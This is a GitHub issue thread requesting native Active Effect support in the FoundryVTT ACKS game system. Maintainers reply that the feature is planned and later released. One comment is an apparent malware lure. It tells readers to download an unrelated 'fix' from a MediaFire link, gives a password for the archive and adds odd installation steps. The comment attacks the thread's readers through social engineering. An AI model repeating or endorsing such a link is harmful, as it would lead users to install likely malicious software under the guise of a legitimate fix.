### ISSUE TITLE
Please include support for the native FVTT Active Effect system

### ISSUE THREAD

**Issue by sirkerry** [AutarchLLC/foundryvtt-acks-core#46]
An RPG as feature rich and complex as ACKS really needs to make use of Active Effects FVTT provides, it looks like the ideal way to handle conditions and spell effects.

It looks like this FVTT version of the game system was forked from the Old-School Essentials game system, there's an add-on module for it named OSR Helper Module that implements active effects and several other QoL features.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LeRatierBretonnien** [comment]
This is planned in a future release to come, active effect will be available natively in the system.

**Comment by ArcanistWill** [comment]
This has been added in release 12.2,0 available now.
